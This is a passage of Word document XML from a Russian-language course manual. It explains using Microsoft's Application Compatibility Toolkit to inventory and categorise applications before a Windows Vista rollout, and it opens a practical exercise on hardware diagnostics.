              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Удаленные компоненты</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7374" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="000C00A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ищет устаревшие технологии, которые больше не поддерживаются в Windows Vista, например, FrontPage Server Extensions. При обнаружении использования таких технологий в приложениях, эти приложения регистрируются.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidTr="000C00A6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2232" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="000C00A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Сеанс 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7374" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="000C00A6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Определяет запросы сеанса 0 и регистрирует соответствующие приложения. Сеанс 0 в Windows Vista полностью защищен, и в нем не могут работать никакие приложения.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Чтобы понять и определить воздействие Windows Vista на ваши приложения, рекомендуется выполнить четыре шага. Во-первых, необходимо провести инвентаризацию всех приложений вашего предприятия и проверить их совместимость. Вы можете использовать для этого систему управления программным обеспечением, например, Systems Management Server (SMS), или простую электронную таблицу, однако ни одно из этих средств не даст вам информацию о совместимости. Эту важную информацию можно получить с помощью средств оценки совместимости, входящих в набор Application Compatibility Toolkit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Первый шаг заключается в том, чтобы создать программный пакет, который можно было бы загружать на настольные компьютеры для полной инвентаризации приложений (см. Рис. 3). Вы можете включить в комплект средства оценки совместимости, для определения приложений, где могут возникнуть проблемы с совместимостью. Пакет можно устанавливать через систему управления программным обеспечением, т.к. он занимает немного места и требует мало ресурсов при работе на клиентском компьютере. В результате вы получите информацию о совместимости ваших компьютеров и приложений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2191350" cy="1407941"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="232" name="Рисунок 26872" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/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2" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image220.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId213" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2195454" cy="1410578"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 3a Создание пакета совместимости</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2191350" cy="1994129"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="233" name="Рисунок 26873" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/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3" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image221.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId214" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2196904" cy="1999183"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 3б</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При получении первого отчета средств оценки совместимости, вам нужна самая актуальная информация по совместимости. Следующий шаг заключается в выполнении синхронизации с Microsoft Compatibility Exchange. Нажмите на значок приема и отправки данных (Send and Receive Data), введите свои учетные данные, и вы подключитесь к Microsoft Compatibility Exchange. Там вы найдете информацию по совместимости, которая поможет вам анализировать, рационализировать и устанавливать приоритеты своего портфеля приложений. Отчет о приложениях содержит информацию о ваших приложениях, предоставленную другими участниками сообщества, разработчиками ПО и корпорацией Майкрософт. Он позволит вам быстро определить уровень совместимости этих приложений. Кроме того, вы получите удобный доступ к известным проблемам и возможным вариантам их решений, что поможет вам сократить общий объем тестирования. Если проблема уже выявлена, вам не нужно заново тестировать и открывать эту проблему или искать возможные решения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Так что задача заключается в том, чтобы максимально сократить число приложений, на которых вы должны концентрировать свои силы. Наиболее эффективный процесс заключается в организации ваших приложений и их разделении на категории.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для начала используйте встроенные функции фильтрации диспетчера совместимости приложений. Инвентарный список будет содержать много приложений, о которых вы можете не беспокоиться (см. Рисунок 4). Например, если вы собираетесь заменять аппаратное обеспечение, вам не нужно беспокоиться по поводу драйверов или специальных приложений OEM-компаний.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2694"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2472150" cy="1724326"/>
            <wp:effectExtent l="19050" t="0" r="4350" b="0"/>
            <wp:docPr id="234" name="Рисунок 26874" descr="http://ok-t.ru/studopedia/baza14/71156389034.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4" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image222.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId215" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2474297" cy="1725824"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 4 Фильтрация диспетчера совместимости приложений</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Следующий шаг начинается с формулировки желаемого способа организации этих приложений для уменьшения числа приложений, требующих внимания. Учитывайте масштаб применения приложения, например, отделяйте глобальные приложения от приложений, которые используются только в нескольких географических областях или отделах. Вы хотите, чтобы все приложения поддерживались их разработчиками, будь то сотрудники компании или сторонние специалисты? Создайте категорию для всех разработчиков и подкатегории для каждого отдельного разработчика, и распределите программы по этим категориям и подкатегориям. Определив организационную стратегию, можете начать сортировку приложений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Можно создавать категории и подкатегории, используя функции организации набора Application Compatibility Toolkit, и создавая собственные записи (см. Рис. 5). Эти записи будут доступны в отчетах, что позволит вам создавать конкретные отчеты для каждой подкатегории.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1334550" cy="1439139"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="235" name="Рисунок 26875" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/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5" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image223.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId216" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1339073" cy="1444017"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 5 Назначение категорий</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Последний шаг анализа заключается в назначении категорий приложениям или компьютерам. Рекомендуется обратить внимание на сотрудников, использующих мобильные ПК, поскольку в Windows Vista имеется много новых функций, облегчающих их работу. Вы можете даже создать категорию или подкатегорию для приложений, которые они используют. Вы можете назначать приложениям несколько категорий, так, вы можете создать категорию группы разработчиков, содержащую в качестве подкатегорий имена разработчиков, что позволит вам отслеживать, какой разработчик отвечает за какое приложение.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое операционная система?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Что</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>такое</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Application Compatibility Toolkit?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00442A4D" w:rsidRPr="00617AC0" w:rsidRDefault="00442A4D" w:rsidP="00442A4D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Из</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>каких</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>компонентов</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>состоит</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Application Compatibility Toolkit?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A45B4F" w:rsidRPr="00617AC0" w:rsidRDefault="00A45B4F" w:rsidP="00A45B4F">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_Toc26278727"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Практическое занятие № 8 Выявление и решение проблем аппаратного сбоя</w:t>
      </w:r>
      <w:r w:rsidR="00A12BEF" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Диагностика оборудования средствами ОС</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
      <w:r w:rsidR="00A12BEF" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A45B4F" w:rsidRPr="00617AC0" w:rsidRDefault="00A45B4F" w:rsidP="00A45B4F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>формирование навыков по диагностике оборудования средствами ОС Windows,</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>выявлению и устран</w:t>
      </w:r>
      <w:r w:rsidR="00F40D1D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ению</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> проблемы с аппаратным сбоем</w:t>
      </w:r>
      <w:r w:rsidR="00F40D1D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A45B4F" w:rsidRPr="00617AC0" w:rsidRDefault="00A45B4F" w:rsidP="00A45B4F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Оборудование: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">персональный компьютер, </w:t>
      </w:r>
      <w:r w:rsidR="00F40D1D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">базовое программное обеспечение, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ресурсы сети интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A45B4F" w:rsidRPr="00617AC0" w:rsidRDefault="00A45B4F" w:rsidP="00A45B4F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Отчет должен содержать скриншоты этапов выполнения работы и комментарии к ним. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A45B4F" w:rsidRPr="00617AC0" w:rsidRDefault="00A45B4F" w:rsidP="00A45B4F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Время выполнения</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 часа</w:t>
      </w:r>
      <w:r w:rsidR="00F40D1D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000717C8" w:rsidRPr="00617AC0" w:rsidRDefault="000717C8" w:rsidP="00F40D1D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F40D1D" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="00F40D1D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000717C8" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Выполнить </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">диагностику </w:t>
      </w:r>
      <w:r w:rsidR="000717C8" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">оборудования </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">с помощью </w:t>
      </w:r>
      <w:r w:rsidR="000717C8" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>с помощью специализированных программ.</w:t>
      </w:r>
    </w:p>
